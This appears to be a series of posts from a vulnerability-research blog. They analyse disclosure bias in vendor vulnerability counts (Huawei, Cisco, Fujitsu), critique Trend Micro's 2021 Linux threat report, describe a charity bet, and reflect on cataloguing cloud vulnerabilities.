With regards to China’s government, specific details about mobile phone adoption is not readily available. By simply looking at Huawei’s market share in China, one might safely assume that their devices are favored by some in the Chinese government. While it has long been rumored that Huawei has a very direct and complicated relationship with their government, which is supported both by Vietnamese academic and U.S. government research, Huawei says their relationship with the government is “no different” than any other company in China.

The U.S. government officially uses a mix of BlackBerry, Apple, and Samsung (Android), meaning that there are three major vendors and three major operating systems. For the Chinese government, apparently there is no officially sanctioned device, but it is very likely Huawei (formerly Android, but moving to Harmony OS / Hóngméng in 2020) and ZTE (Android) phones are heavily used. Looking at the last three calendar years, here is a comparison between the vendors to see how many vulnerabilities have been posted:

With these numbers it may seem like BlackBerry represents more risk. However, if BlackBerry shares the same vulnerabilities as any other Android device, and they disclose vulnerabilities in applications they ship, that number can be higher. The same can be said for any other Android phone that ships with packaged vulnerable apps and components as well, so the 1,338 Android vulnerabilities are not a full representation for other devices (e.g. Samsung, Huawei, ZTE). We then have to remind readers that comparing open source software such as Android to closed source such as BlackBerry OS and Apple can introduce bias in disclosure numbers. Another aspect to consider is that the amount of devices being used may influence how many people are actually performing security research on them.

Ultimately, this means neither the U.S. or China can justify banning devices based on phone vulnerability history alone. Trying to state one vendor is more “vulnerable” than the other using currently available vulnerability data alone requires so many disclaimers that the end result loses its potency.

Routers & TelCom: Huawei vs. Cisco et al

The second major aspect of concerns over technology from one country being pervasive in another is that of access. Everyone from the carriers to end users expects the equipment to function seamlessly, giving us access to the internet and mobile service. That service is built on a complex infrastructure of telecommunications (telecoms) hardware and software produced by companies such as Huawei, Cisco, Fujitsu, Nokia, and Ericsson. The telecom hardware includes routers, base transceiver stations, fiber optical networks, satellites, and a lot more. As of 2017, Chinese companies produced the most telecom equipment in the world, about 14% more than the United States.

Looking at these vendors for the last four calendar years, we get another lesson in how there is significant bias introduced into vulnerability statistics due to disclosures. Cisco had 2,227 vulnerabilities in that time. Compared to Huawei with only 813, one might conclude that Cisco’s software is inherently riskier. But compare Cisco with the three other companies. Fujitsu enjoys 79% of the market share by revenue, yet only had 24 vulnerabilities in that time frame. Going off that logic, can we conclude that Fujitsu is the most secure?

Consider that of Fujitu’s 24 vulnerabilities, only three are in their products and one of them a keyboard. The other 21 vulnerabilities are in third-party software or hardware (e.g. Intel processors). Cisco on the other hand has an incredible number of vulnerabilities reported, but they rarely publish that they are affected by vulnerabilities in OpenSSL and Intel for example, despite using those technologies in some of their devices.

Both Cisco and Fujitsui maintain contact pages for reporting security vulnerabilities, have a formal PSIRT team to respond to vulnerability reports, and both publish security advisories. Despite this, they have public disclosure histories that are about as opposite as you can find in many ways. We know for a fact both companies use hundreds of third-party libraries in their code, yet neither publish when third-party vulnerabilities affect their software. Based on our extensive history of tracking vulnerabilities, we are quite certain that Fujitsu products have, or have had, more vulnerabilities than they have officially disclosed. Any notion that Fujitsu (24) is a one-off situation can be dismissed when looking at Nokia (11) and Ericsson (8) for the same periods. That suggests Cisco and Huawei are outliers.

We can apply this same scrutiny to Huawei, with only 813 vulnerabilities despite their large market share, and their considerable transparency when it comes to third-party vulnerabilities. In the world of vulnerability research, access to software and equipment is essential, of course. Some may argue that Huawei equipment isn’t readily available to many researchers, and that might be true for U.S.-based researchers. But the last decade has shown an incredible number of extremely talented security researchers in China, who would presumably have more access. If one were to argue that China is looking to restrict vulnerability disclosure, that certainly will be something to consider moving forward. However, that plan is still preliminary and has not been implemented.

Conclusion: Overkill

You need comprehensive, detailed, and actionable data in order to make informed decisions. Following this mantra, we are comfortable in assessing that with the currently available vulnerability data, a hard stance condemning either side is not possible. As much as we would like it to be, the comparison of vulnerabilities within vendors cannot be a panacea.

That being said, does this mean that both the U.S. and Chinese governments are banning each other’s products solely for political posturing, or is it actually an informed decision? As we can see, it may be easy to arrive at a conclusion when looking at the data. But as informed citizens we all need to be aware of the disclaimers and hidden perspectives that the data may not overtly reveal. The answer is not so simple as “well, this has more vulnerabilities than that”.

Without concrete evidence of backdoors in Huawei products, the concern is definitely valid, but a total ban is overkill and may have far-reaching unintended consequences. As the “war on tech” has raged on, both the U.S. and China have suffered casualties.

Commentary on Trend Micro’s Linux Threat Report 2021

On August 23, 2021, Trend Micro released a report titled “Linux Threat Report 2021 1H” by Magno Logan and Pawan Kinger. The report is based on Trend Micro’s Smart Protection Network (SPN) which they call “the data lake for all detections across all Trend Micro’s products“. Basically, every security product they make that detects vulnerabilities and reports them back to Trend Micro can and is used in their research like this, among other things. They further qualify that the report is based on additional data “collected data from honeypots, sensors, anonymized telemetry, and other backend services” and represents “the real-world prevalence of malware and vulnerability exploitation across enterprises” regardless of size or vertical.

Reports that talk about the most exploited vulnerabilities are compelling. They offer a short list of vulnerabilities that organizations can be absolutely sure they patched and offer no risk. Unfortunately, many of these reports have problems. I have written about some before including 2015 Verizon DBIR, 2016 Verizon DBIR, and Radware’s Top Web Exploits of 2020. I wish I had more time as I have seen other reports on exploit prevalence that had similar issues. In this case, Trend Micro’s report falls into at least one of the same traps that these prior reports have.

The first issue that pops out is the wording in the report that introduces a major point of confusion. In section two, titled “The Linux threat landscape: What are the top Linux threats?“, under the second heading titled “Vulnerabilities in Linux systems“, we get more details qualifying where the data came from to generate this part of the report:

“… we dissected IPS (Intrusion Prevention System) hits from Trend Micro Cloud One – Workload Security and sifted through over 50 million events, ignored false positives, eliminated test data, and layered data with available threat intel to draw some conclusions.”

Unfortunately, the next sentence immediately introduces some doubt and we don’t know how much doubt there is because they don’t qualify their error of marging:

“It should be noted that there can be a degree of error here due to the nature of the data and internet activity.”

If the margin for error is 1% in a dataset that large, not a big deal. If it is 10%, that can be problematic. If it is 50% then the report shouldn’t have even been written. We get to guess where that margin of error is apparently.

Now, for the section of the report that initially got my attention, we get to the top 15 vulnerabilities. I can’t finish that sentence because there is confusion:

If a list of vulnerabilities includes the top 15 that are “actively exploited” or “have a known proof of concept”, how do you even? Over 4,500 vulnerabilities in 2021 H1 have a public proof-of-concept or functional exploit. The next sentence clearly repeats the exact same thing. I can’t figure out how to explain that second part unless they are attempting to say “actively exploited and a public proof of concept” to distinguish from exploitation that is happening where the exploit is not actually published. That seems like a pretty big oversight given the nature of this section of the report. Further, it doesn’t qualify if the report is based on attempted exploitation that matches a signature or successful exploitation. After the table of vulnerabilities the report says “Table 1 shows the top vulnerabilities by volume of triggers.” which strongly suggests it is looking for exploit attempts. But that just leads to more questions like “if you see an attempt for that vulnerability but against a Windows server, does it count?

It gets even murkier looking at the table of the 15 vulnerabilities where one of them is listed as “N/A” for severity. That warrants digging into their list more closely and comparing the vulnerability information with that in VulnDB.

There are several observations to be made for this list:

  • CVE-2017-9805 is listed as ‘High’ severity suggesting they pulled at least some vulnerability data from the National Vulnerability Database. They score the vulnerability 8.1 (High) while VulnDB and CERT VU scores it 10.0. Looking at the original disclosure, there are no obvious qualifications that seem to justify an Access Complexity High (AC:H) rating.
  • Of the 430 vulnerabilities involving WordPress, base or plugins, that allow for remote code execution, why did only one make the list (CVE-2020-25213), and why that one? Given the amount of scanning for vulnerable WordPress installations I would expect more to be on the list. Hell, even the venerable CVE-2013-4338 given there are other CVE-2013s on the list.
  • The Atlassian Jira vulnerability is very curious given that it is a remote information disclosure issue and does not disclose sensitive information such as a password, that would result in further privilege escalation. Based on the logs of attrition.org over the last three months, there has been a single request for /secure/QueryComponent!Default.jspa. There have been five requests for /secure/QueryComponentRendererValue!Default.jspa (CVE-2020-36289) which is another information disclosure issue. There are also hundreds of information disclosure vulnerabilities that yield credentials which can be used to authenticate to an application to gain privileges. I would expect to see any one of those on the list before CVE-2020-14179.
  • Eclipse Jetty (CVE-2017-7657) is very curious to see on this list for several reasons. First, a four year old vulnerability that does not result in code execution. Second, there is a caveat for exploitation as explained in the Eclipse bug ticket: “was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary“. To see an HTTP request smuggling issue be that widely exploited over the thousands of other vulnerabilities that allow for a more serious impact in software found running on Linux is baffling. This strongly suggests the detection rule matching for that vulnerability is overly broad and triggers on exploit attempts for different issues.
  • The nginx vulnerability is listed as N/A which is curious. Looking at the associated NVD entry (CVE-2013-4547) we see they have a CVSSv2 score, but not a CVSSv3 score. That is due to it being a 2013 vulnerability and NVD not retroactively scoring all vulnerabilities. This, along with CVE-2017-9805 tells us that Trend Micro imported the scores from NVD but didn’t adjust for this one by using the CVSSv2 score, or developing their own CVSSv3 score. It seems weird to blindly use the CVSSv3 scores and have incomplete data when it is a simple correction to make.

Looking back to bullet #3, it’s interesting to compare the hits seen on our web server and then note that we also observed 10,659 requests for /wp-login.php in that same period. This, I think, illustrates a serious flaw in the methodology of this report. Most of the scanning we see for vulnerable WordPress instances is first looking for the presence of the software before attempting to exploit anything. Rather than throw hundreds of payloads for various flaws in the core software and vulnerable themes or plugins, it’s more efficient to check if the software is present first. Scan for the software to build a list of sites that are running WordPress before launching more significant attacks that may attract more attention.

As always, a real test to the veracity of this data would be for another firm that does large-scale monitoring of attacks to publish their own data, limited to the same approximate criteria as Trend Micro. That might explain bullet #4 at the very least.

Niki7a vs Magen – Charity Drive

Like the epic rumble in the jungle, after a quick offer to throw money to charity on behalf of their suffering, other generous souls jumped in to do the same. The result? Niki7a and Magen are now locked in a legendary contest to see who can wear their DEF CON 29 bracelet the longest. Whoever wears the bracelet the longest gets to pick the charity we donate to. Magen has opted to have donations go to SailFuture, “a comprehensive child welfare agency, and private school based in St. Petersburg, Florida” who’s mission is “to innovate and develop effective programs for high-risk youth, particularly youth in foster care.” At the time of this blog, Niki7a is still deciding.

Image courtesy @drwolfff

This started out with Nikit7a’s innocent Tweet:

Magen qualified that there are challenge coin rules to keep each other honest:

With all of the people kicking in to donate, I will maintain a spreadsheet to track pledges and totals!

Reflections on “CVE Approach for Cloud Vulnerabilities”

At Black Hat Briefings USA this week, Ami Luttwak and Shir Tamari called for a “CVE” style approach to documenting vulnerabilities that affect cloud offerings (note: I have not seen the talk). As one of two people (the other being Jake Kouns) that may have the longest history in this specific space, I wanted to give some history and very high-level reflection on the challenges and benefits of this endeavor. First, for perspective, CVE covers at least 56 pure cloud / site-specific vulnerabilities, the first going back as far as 2000. They cover at least another 461 that are hosted blockchain contracts. At times, some of the CVE (Editorial) Board has advocated for CVE to expand to cover cloud vulnerabilities while others argue against it. At least one who advocated for CVE coverage said they should get CVE IDs, while others that supported and disagreed with the idea saying that if cloud was covered, they should get their own ID scheme. MITRE has not made a clearly policy change on that in years, despite increasing coverage primarily of hosted blockchain contracts.

Next, the idea of “CVE for Cloud” has been done! Well, it was attempted at least. Back in the day, the Open Security Foundation was desperately trying to maintain the Open Sourced Vulnerability Database (OSVDB) and DatalossDB. Neither project had enough volunteers and community support simply wasn’t there. Despite that, we spun up a project called Cloutage (archive.org link) in 2010, that originally aimed to catalog instances of cloud service outages as well. The idea was this would tell companies which ones actually had the alleged 99.999% uptime, which regions of a provider were more prone to issues, and more. We were collecting incidents categorized as “hack”, “outage”, or “vuln” long before that with the intent of such a project, but that is when we finally made them publicly available in an organized fashion. So my reflections come with real-world experience; the challenges we faced, along with the pitfalls of such an endeavor, are still largely present. (For convenience, I will use the term ‘cloud’ to refer to service providers that are subscription offerings and not on-premises hardware / solutions.)

First, let’s begin with one significant change from the mid 2000s to today. Over ten years ago, cloud providers with a vulnerability were typically an issue they had to fix and were out of the customer’s control. While that is still prevalent today, we see another class of cloud vulnerabilities that better warrant a “CVE for Cloud” approach. Those are cases where a vulnerability is present in a cloud offering and requires a customer to mitigate it themselves. These will often be described as misconfigurations like the pervasive open S3 buckets that can be accessed without credentials, disclosing a world of information or hosting malicious software [1] [2] [3]. There is a fundamental difference between a security issue that requires the customer to mitigate versus one they must wait for the cloud provider to fix.

Historically, when a vast majority of the security issues fell into the “wait for the provider to fix” category, we cataloged those vulnerabilities but questioned the value. Sure, it had value in that a company could evaluate cloud providers to see which had more vulnerabilities and how long it took to fix sometimes. But even that was crippled in that companies would only announce them after the issue was fixed. That meant we knew a vulnerability was present for some undetermined time, and then patched. But cloud providers weren’t including how long customers were exposed and most providers simply were not disclosing at all. So the database was a fraction of the actual vulnerabilities, typically with no known exposure window, and customers were powerless to do anything about it.

Another issue we ran into was that the rare times a cloud provider disclosed the issue, it was extremely vague. More frustrating is when they used language implying that some, but not all of customers were impacted. They didn’t include regions or IP ranges or anything else to identify who was affected so a customer couldn’t even guarantee they were without opening a support ticket and hoping to get an honest answer. That was frustrating and not very helpful. How will security teams cope if they find out there is a public vulnerability in a cloud offering and no mitigating control? Seems like a recipe for stressful days. Of course, it’s no different than no except for today ignorance is bliss.

CVSS is a defacto risk scoring framework for vulnerabilities. It was designed around vulnerabilities that appear in CVE, which is predominantly on-premises software. Would CVSS scale to work for cloud vulnerabilities? CVSSv2 seems like it would be as suitable for cloud as on-premises given its more simple scoring elements. CVSSv3 seems like it could be more problematic and not take advantage of some of the changes over v2. First, the ‘physical’ location would effectively be eliminated. Second, would Authorization Scope be neutered? Defined initially as “ability for a vulnerability in one software component to impact resources beyond its means, or privileges“, on the surface it seems like every vulnerability would have to be evaluated more closely for scope change. Every vulnerability potentially causes the cloud provider, a different company than the one using the service, to get involved in some way. The cloud provider’s support and security teams spending time because $CompanyA’s instance got popped technically “impacts resources beyond its means”. I don’t think that is what the CVSS SIG had in mind though. That said, given the shared environments of many cloud offerings, sandbox escapes and lateral movement potentially impacts completely different organizations. Does a simple “scope changed” modifier to a score adequately convey the potential risk?

Finally, who’s going to run this “CVE for Cloud”? OSVDB and subsequent similar projects give a damning history showing there is a lot of vocal support for community-run vulnerability resources, but they very rarely see the actual time required from those vocal folks. If it is run by one person or a small group of dedicated volunteers, how long before they burnout or commercialize it? There’s a reason most of the public VDBs have gone away, or gone commercial to varying degrees (e.g. OSVDB, Secunia, BID). The only thing worse than such a project not getting off the ground is one that does, becomes an essential part of security programs, and then goes away.

I look forward to seeing the talk by Luttwak and Tamari, if it is made public. I’m curious if they have come up with solutions that have plagued vulnerability databases for over two decades.

[Update: Josh Bressers points out that the Cloud Security Alliance (CSA) wants to address this problem too.]